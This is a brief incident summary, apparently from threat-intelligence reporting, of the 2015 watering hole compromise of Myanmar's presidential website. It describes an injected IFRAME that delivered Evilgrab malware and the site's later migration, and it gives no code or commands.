Cyber Incident Victim: Myanmar

On May 12, 2015, Unit 42 identified a watering hole attack targeting the official website of the President of Myanmar, hosted at "www.president-office.gov[.]mm". The compromise involved injecting an inline frame (IFRAME) into a JavaScript file utilized by the Drupal content management system for the site's theme. This malicious modification caused visitors to the main page to unknowingly load the exploit content. Evidence indicated threat actors had maintained unauthorized access to the website since at least November 2014, suggesting prolonged surveillance or staging prior to the observed exploitation. The attackers selected this high-profile government platform to target individuals in Myanmar, those engaged in political relations with the country, and organizations conducting business there. The operational security lapse enabled the threat group to leverage the site's legitimacy to distribute malware to visitors.

Unit 42 notified the website operators, who subsequently took the compromised domain offline. A replacement website with identical content was established at "www.myanmarpresidentoffice.info", which retained artifacts referencing the original domain but contained no traces of the exploit code. This migration appeared to be part of the remediation strategy following the disclosure. The delivered payload, identified as Evilgrab (also known as Vidgrab), exhibited characteristics consistent with information-gathering malware, though specific functionalities were not detailed in the public analysis. The incident highlighted the persistent targeting of Myanmar's digital infrastructure, with threat actors exploiting web platform vulnerabilities to conduct strategic compromises. The website's extended period of unauthorized access underscored challenges in detecting and mitigating sophisticated intrusions against government assets.